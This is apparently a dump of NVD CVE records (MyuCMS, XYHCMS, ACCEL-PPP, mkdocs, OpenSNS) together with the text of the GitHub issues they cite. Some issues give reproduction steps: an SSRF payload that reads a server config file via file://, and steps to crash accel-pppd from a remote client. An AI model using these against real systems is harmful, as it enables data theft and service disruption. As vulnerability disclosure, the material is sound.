[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:myucms_project:myucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "E6EECCAA-F4A9-4487-B39D-F50A1AD720D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/lolipop1234/XXD/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "lolipop1234", "XXD" ]
1.Visit the following URL after login http://127.0.0.1/admin.php/index/sj 2.POST following data to http://127.0.0.1/admin.php/index/sj title=file://C:\phpStudy\PHPTutorial\WWW\application\config.php ![image](https://user-images.githubusercontent.com/30997848/71565440-c7706580-2ae9-11ea-9723-04ca9405abcf.png) 3.Visit the following URL download shengji.zip http://127.0.0.1/runtime/myucms/ shengji.zip 4.Open this zip file with notepade++ config.php file content has been read ![image](https://user-images.githubusercontent.com/30997848/71565417-95f79a00-2ae9-11ea-9725-2f14de807683.png) ps:If the data sent is changed to the Internet address, you can get the content of the Internet page title=http://www.baidu.com ![image](https://user-images.githubusercontent.com/30997848/71565426-b45d9580-2ae9-11ea-8391-5e2d0d12c415.png) Problem code location WWW\application\admin\controller\index.php ![image](https://user-images.githubusercontent.com/30997848/71565265-01d90300-2ae8-11ea-95f3-ccf17f51c146.png)
SSRF of Myucms v2.2 /application/admin/controller/index.php sj() method
https://api.github.com/repos/lolipop1234/XXD/issues/5/comments
0
2019-12-27T02:51:36Z
2019-12-30T01:50:31Z
https://github.com/lolipop1234/XXD/issues/5
542,723,242
5
2,667
CVE-2020-21656
2021-10-06T22:15:07.983
XYHCMS v3.6 contains a stored cross-site scripting (XSS) vulnerability in the component xyhai.php?s=/Link/index.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gosea/xyhcms3/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gosea/xyhcms3/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xyhcms:xyhcms:3.6:*:*:*:*:*:*:*", "matchCriteriaId": "56A03ECB-AD3C-4433-91BF-957F37B9ACFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/gosea/xyhcms3/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gosea", "xyhcms3" ]
![image](https://user-images.githubusercontent.com/35941559/71615138-a6436e00-2bea-11ea-991b-c65e38ecc6e5.png) ![image](https://user-images.githubusercontent.com/35941559/71615084-58c70100-2bea-11ea-9812-ff9e6bfc429d.png) ![image](https://user-images.githubusercontent.com/35941559/71615111-8f048080-2bea-11ea-9d93-7b5733dc4fbd.png)
There is a stored xss in 'xyhai.php?s=/Link/index'.
https://api.github.com/repos/gosea/xyhcms3/issues/2/comments
0
2019-12-31T08:29:04Z
2019-12-31T08:29:04Z
https://github.com/gosea/xyhcms3/issues/2
544,125,821
2
2,668
CVE-2021-42054
2021-10-07T06:15:07.007
ACCEL-PPP 1.12.0 has an out-of-bounds read in triton_context_schedule if the client exits after authentication.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xebd/accel-ppp/issues/156" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/xebd/accel-ppp/issues/156" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:accel-ppp:accel-ppp:1.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "6C5B872F-636C-4C57-9D89-BB58B8B0BAE0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/xebd/accel-ppp/issues/156
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "xebd", "accel-ppp" ]
Using version `accel-ppp version 1.12.0-149-gff91c73`. The issue #154 can be triggered even by remote client. ## Steps to reproduce 1. Build access-ppp: ```shell mkdir build && cd build cmake -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DBUILD_DRIVER=false -DCMAKE_INSTALL_PREFIX=/usr/local -DCMAKE_BUILD_TYPE=Debug -DLOG_PGSQL=TRUE -DSHAPER=TRUE -DRADIUS=TRUE -DNETSNMP=TRUE .. CC=clang CXX=clang++ CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" make -j ``` 2. Run `access-pppd`, use pptp server: ```shell accel-pppd -c /etc/accel-ppp.conf ``` The running configuration `/etc/accel-ppp.conf` is: ``` [modules] log_file #log_syslog #log_tcp #log_pgsql pptp l2tp #sstp #pppoe #ipoe auth_mschap_v2 auth_mschap_v1 auth_chap_md5 auth_pap #radius chap-secrets ippool pppd_compat #shaper #net-snmp #logwtmp #connlimit #ipv6_nd #ipv6_dhcp #ipv6pool [core] log-error=/var/log/accel-ppp/core.log thread-count=4 [common] #single-session=replace #single-session-ignore-case=0 #sid-case=upper #sid-source=seq #max-sessions=1000 #max-starting=0 #check-ip=0 [ppp] verbose=1 min-mtu=1280 mtu=1400 mru=1400 #accomp=deny #pcomp=deny #ccp=0 #mppe=require ipv4=require ipv6=deny ipv6-intf-id=0:0:0:1 ipv6-peer-intf-id=0:0:0:2 ipv6-accept-peer-intf-id=1 lcp-echo-interval=20 #lcp-echo-failure=3 lcp-echo-timeout=120 unit-cache=1 #unit-preallocate=1 [auth] #any-login=0 #noauth=0 [pptp] verbose=1 #echo-interval=30 ip-pool=pool1 #ipv6-pool=pptp #ipv6-pool-delegate=pptp ifname=pptp%d #port=9300 #mppe=prefer [pppoe] verbose=1 #ac-name=xxx #service-name=yyy #pado-delay=0 #pado-delay=0,100:100,200:200,-1:500 called-sid=mac #tr101=1 #padi-limit=0 #ip-pool=pppoe #ipv6-pool=pppoe #ipv6-pool-delegate=pppoe #ifname=pppoe%d #sid-uppercase=0 #vlan-mon=eth0,10-200 #vlan-timeout=60 #vlan-name=%I.%N #interface=eth1,padi-limit=1000 interface=ens18 [l2tp] verbose=1 #dictionary=/usr/local/share/accel-ppp/l2tp/dictionary #hello-interval=60 #timeout=60 #rtimeout=1 #rtimeout-cap=16 #retransmit=5 #recv-window=16 #host-name=accel-ppp #dir300_quirk=0 #secret= #dataseq=allow #reorder-timeout=0 #ip-pool=l2tp #ipv6-pool=l2tp #ipv6-pool-delegate=l2tp #ifname=l2tp%d [sstp] verbose=1 #cert-hash-proto=sha1,sha256 #cert-hash-sha1= #cert-hash-sha256= #accept=ssl,proxy #ssl-protocol=tls1,tls1.1,tls1.2,tls1.3 #ssl-dhparam=/etc/ssl/dhparam.pem #ssl-ecdh-curve=prime256v1 #ssl-ciphers=DEFAULT #ssl-prefer-server-ciphers=0 #ssl-ca-file=/etc/ssl/sstp-ca.crt #ssl-pemfile=/etc/ssl/sstp-cert.pem #ssl-keyfile=/etc/ssl/sstp-key.pem #host-name=domain.tld #http-error=allow #timeout=60 #hello-interval=60 #ip-pool=sstp #ipv6-pool=sstp #ipv6-pool-delegate=sstp #ifname=sstp%d [ipoe] verbose=1 username=ifname #password=username lease-time=600 #renew-time=300 #rebind-time=525 max-lease-time=3600 #unit-cache=1000 #l4-redirect-table=4 #l4-redirect-ipset=l4 #l4-redirect-on-reject=300 #l4-redirect-ip-pool=pool1 shared=0 ifcfg=1 mode=L2 start=dhcpv4 #start=up #ip-unnumbered=1 #proxy-arp=0 #nat=0 #proto=100 #relay=10.10.10.10 #vendor=Custom #weight=0 #attr-dhcp-client-ip=DHCP-Client-IP-Address #attr-dhcp-router-ip=DHCP-Router-IP-Address #attr-dhcp-mask=DHCP-Mask #attr-dhcp-lease-time=DHCP-Lease-Time #attr-dhcp-renew-time=DHCP-Renewal-Time #attr-dhcp-rebind-time=DHCP-Rebinding-Time #attr-dhcp-opt82=DHCP-Option82 #attr-dhcp-opt82-remote-id=DHCP-Agent-Remote-Id #attr-dhcp-opt82-circuit-id=DHCP-Agent-Circuit-Id #attr-l4-redirect=L4-Redirect #attr-l4-redirect-table=4 #attr-l4-redirect-ipset=l4-redirect #lua-file=/etc/accel-ppp.lua #offer-delay=0,100:100,200:200,-1:1000 #vlan-mon=eth0,10-200 #vlan-timeout=60 #vlan-name=%I.%N #ip-pool=ipoe #ipv6-pool=ipoe #ipv6-pool-delegate=ipoe #idle-timeout=0 #session-timeout=0 #soft-terminate=0 #check-mac-change=1 #calling-sid=mac #local-net=192.168.0.0/16 interface=eth0 [dns] #dns1=172.16.0.1 #dns2=172.16.1.1 [wins] #wins1=172.16.0.1 #wins2=172.16.1.1 [radius] #dictionary=/usr/local/share/accel-ppp/radius/dictionary nas-identifier=accel-ppp nas-ip-address=127.0.0.1 gw-ip-address=192.168.100.1 server=127.0.0.1,testing123,auth-port=1812,acct-port=1813,req-limit=50,fail-timeout=0,max-fail=10,weight=1 dae-server=127.0.0.1:3799,testing123 verbose=1 #timeout=3 #max-try=3 #acct-timeout=120 #acct-delay-time=0 #acct-on=0 #acct-interim-interval=0 #acct-interim-jitter=0 #default-realm= #strip-realm=0 #attr-tunnel-type=My-Tunnel-Type [client-ip-range] 0.0.0.0/0 [ip-pool] gw-ip-address=192.168.0.1 #vendor=Cisco #attr=Cisco-AVPair attr=Framed-Pool 192.168.0.2-255 192.168.1.1-255,name=pool1 192.168.2.1-255,name=pool2 192.168.3.1-255,name=pool3 192.168.4.1-255,name=pool4,next=pool1 192.168.4.0/24 [log] log-file=/var/log/accel-ppp/accel-ppp.log log-emerg=/var/log/accel-ppp/emerg.log log-fail-file=/var/log/accel-ppp/auth-fail.log log-debug=/dev/stdout syslog=accel-pppd,daemon #log-tcp=127.0.0.1:3000 copy=1 color=1 #per-user-dir=per_user #per-session-dir=per_session #per-session=1 level=5 [log-pgsql] conninfo=user=log log-table=log [pppd-compat] verbose=1 #ip-pre-up=/etc/ppp/ip-pre-up ip-up=/etc/ppp/ip-up ip-down=/etc/ppp/ip-down #ip-change=/etc/ppp/ip-change radattr-prefix=/var/run/radattr #fork-limit=16 [chap-secrets] gw-ip-address=192.168.100.1 chap-secrets=/etc/ppp/chap-secrets.ppp #encrypted=0 #username-hash=md5 [shaper] #attr=Filter-Id #down-burst-factor=0.1 #up-burst-factor=1.0 #latency=50 #mpu=0 #mtu=0 #r2q=10 #quantum=1500 #moderate-quantum=1 #cburst=1534 #ifb=ifb0 up-limiter=police down-limiter=tbf #leaf-qdisc=sfq perturb 10 #leaf-qdisc=fq_codel [limit PACKETS] [flows NUMBER] [target TIME] [interval TIME] [quantum BYTES] [[no]ecn] #rate-multiplier=1 #fwmark=1 #rate-limit=2048/1024 verbose=1 [cli] verbose=1 telnet=127.0.0.1:2000 tcp=127.0.0.1:2001 #password=123 #sessions-columns=ifname,username,ip,ip6,ip6-dp,type,state,uptime,uptime-raw,calling-sid,called-sid,sid,comp,rx-bytes,tx-bytes,rx-bytes-raw,tx-bytes-raw,rx-pkts,tx-pkts [snmp] master=0 agent-name=accel-ppp [connlimit] limit=10/min burst=3 timeout=60 [ipv6-pool] #gw-ip6-address=fc00:0:1::1 #vendor= #attr-prefix=Delegated-IPv6-Prefix-Pool #attr-address=Stateful-IPv6-Address-Pool fc00:0:1::/48,64 fc00:0:2::/48,64,name=pool1 fc00:0:3::/48,64,name=pool2,next=pool1 delegate=fc00:1::/36,48 delegate=fc00:2::/36,48,name=pool3 delegate=fc00:3::/36,48,name=pool4,next=pool3 [ipv6-dns] #fc00:1::1 #fc00:1::2 #fc00:1::3 #dnssl=suffix1.local.net #dnssl=suffix2.local.net. [ipv6-dhcp] verbose=1 pref-lifetime=604800 valid-lifetime=2592000 route-via-gw=1 ``` use `chap-secrets` and the `/etc/ppp/chap-secrets.ppp` is as follows: ``` # Secrets for authentication using CHAP # client server secret IP addresses fouzhe * 123 * ``` 3. Install pptp client: ``` apt-get update && apt-get install -y ppp pptp-linux inetutils-ping net-tools iproute2 ``` 4. Run the client: ``` strace -f pptpsetup --create pptpd --server 127.0.0.1 --username fouzhe --password 123 --start ``` (Hint: we need to follow the forked subprocesses and control them, therefore we used the `strace -f` to execute the pptp client instead of simply using `pptpsetup --create pptpd --server 127.0.0.1 --username fouzhe --password 123 --start`.) 5. Kill (`Ctrl^C`) the client after authentication succeeded. Then the `accel-pppd` will crash due to ` stack-buffer-underflow `. ``` ================================================================= ==1340656==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7feb635ecc40 at pc 0x000000499d97 bp 0x7feb635ecbd0 sp 0x7feb635ec398 READ of size 8512 at 0x7feb635ecc40 thread T4 [2021-10-06 16:54:44.230] pptp0: 78a9b1ca73485bca: pppd_compat: ip-down finished (0) #0 0x499d96 in __asan_memcpy /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 #1 0x7feb6e4bf3be in alloc_context /root/projects/accel-ppp/accel-pppd/triton/triton.c:485:2 #2 0x7feb6e4bc17d in triton_context_schedule /root/projects/accel-ppp/accel-pppd/triton/triton.c:497:12 #3 0x7feb65600dab in ev_ses_finished /root/projects/accel-ppp/accel-pppd/extra/pppd_compat.c:380:4 #4 0x7feb6e4c6f9e in triton_event_fire /root/projects/accel-ppp/accel-pppd/triton/event.c:103:3 #5 0x4cfb09 in ap_session_finished /root/projects/accel-ppp/accel-pppd/session.c:183:2 #6 0x4e06d9 in destablish_ppp /root/projects/accel-ppp/accel-pppd/ppp/ppp.c:307:2 #7 0x4e0b42 in ppp_terminate /root/projects/accel-ppp/accel-pppd/ppp/ppp.c #8 0x4d148d in ap_session_terminate /root/projects/accel-ppp/accel-pppd/session.c:297:6 #9 0x7feb696e1380 in pptp_call_clear_rqst /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:401:3 #10 0x7feb696e1380 in process_packet /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:478:11 #11 0x7feb696e1380 in pptp_read /root/projects/accel-ppp/accel-pppd/ctrl/pptp/pptp.c:527:9 #12 0x7feb6e4b91c1 in ctx_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:252:10 #13 0x7feb6e4b91c1 in triton_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:192:5 #14 0x7feb6e476608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477:8 #15 0x7feb6de4f292 in clone /build/glibc-eX1tMB/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95 Address 0x7feb635ecc40 is located in stack of thread T4 at offset 0 in frame #0 0x7feb656005df in ev_ses_finished /root/projects/accel-ppp/accel-pppd/extra/pppd_compat.c:340 This frame has 7 object(s): [32, 4128) 'fname.i' (line 497) <== Memory access at offset 0 partially underflows this variable [4256, 4320) 'argv' (line 342) <== Memory access at offset 0 partially underflows this variable [4352, 4480) 'env' (line 343) <== Memory access at offset 0 partially underflows this variable [4512, 5536) 'env_mem' (line 344) <== Memory access at offset 0 partially underflows this variable [5664, 5681) 'ipaddr' (line 345) <== Memory access at offset 0 partially underflows this variable [5728, 5745) 'peer_ipaddr' (line 346) <== Memory access at offset 0 partially underflows this variable [5792, 5920) 'set' (line 385) <== Memory access at offset 0 partially underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) Thread T4 created by T0 here: #0 0x484d4c in pthread_create /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:205:3 #1 0x7feb6e4b7eee in create_thread /root/projects/accel-ppp/accel-pppd/triton/triton.c:320:9 #2 0x7feb6e4bec17 in triton_run /root/projects/accel-ppp/accel-pppd/triton/triton.c:744:7 #3 0x559603 in main /root/projects/accel-ppp/accel-pppd/main.c:415:2 #4 0x7feb6dd540b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: stack-buffer-underflow /home/brian/src/llvm_releases/llvm-project/llvm/utils/release/final/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy Shadow bytes around the buggy address: 0x0ffdec6b5930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffdec6b5940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffdec6b5950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffdec6b5960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ffdec6b5970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0ffdec6b5980: 00 00 00 00 00 00 00 00[f1]f1 f1 f1 f8 f8 f8 f8 0x0ffdec6b5990: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0ffdec6b59a0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0ffdec6b59b0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0ffdec6b59c0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0ffdec6b59d0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1340656==ABORTING ``` The detailed log of `accel-pppd` is shown in [accel-ppp.log](https://github.com/xebd/accel-ppp/files/7292498/accel-ppp.log).
The stack-buffer-underflow bug can be triggered even by remote client
https://api.github.com/repos/xebd/accel-ppp/issues/156/comments
4
2021-10-06T09:29:07Z
2022-02-05T03:05:24Z
https://github.com/xebd/accel-ppp/issues/156
1,017,890,741
156
2,669
CVE-2021-40978
2021-10-07T14:15:08.280
The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs/issues/2601" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs/issues/2601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "F35885F9-FB98-4930-AEED-17BE8A670138", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/mkdocs/mkdocs/issues/2601
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "mkdocs", "mkdocs" ]
Hey! We have verified a security flaw in the current version of MKdocs, a path traversal failure affecting the built-in dev-server. That flaw turns the server susceptible to providing data outside the scope of the application allowing anyone to request sensitive files. If you need further information, don't hesitate to get in touch with me. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40978 https://github.com/nisdn/CVE-2021-40978
CVE-2021-40978 - Path Traversal.
https://api.github.com/repos/mkdocs/mkdocs/issues/2601/comments
7
2021-10-08T03:48:27Z
2023-12-15T11:56:29Z
https://github.com/mkdocs/mkdocs/issues/2601
1,020,667,389
2,601
2,670
CVE-2021-40978
2021-10-07T14:15:08.280
The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs/issues/2601" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mkdocs/mkdocs/issues/2601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nisdn/CVE-2021-40978/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "F35885F9-FB98-4930-AEED-17BE8A670138", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/nisdn/CVE-2021-40978/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nisdn", "CVE-2021-40978" ]
Did you report this upstream?
Did you report this upstream?
https://api.github.com/repos/nisdn/CVE-2021-40978/issues/1/comments
2
2021-10-07T18:27:12Z
2021-10-08T13:55:12Z
https://github.com/nisdn/CVE-2021-40978/issues/1
1,020,336,348
1
2,671
CVE-2020-21725
2021-10-07T22:15:07.353
OpenSNS v6.1.0 contains a blind SQL injection vulnerability in /Controller/ChinaCityController.class.php via the pid parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CoColizdf/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CoColizdf/CVE/issues/1" } ]
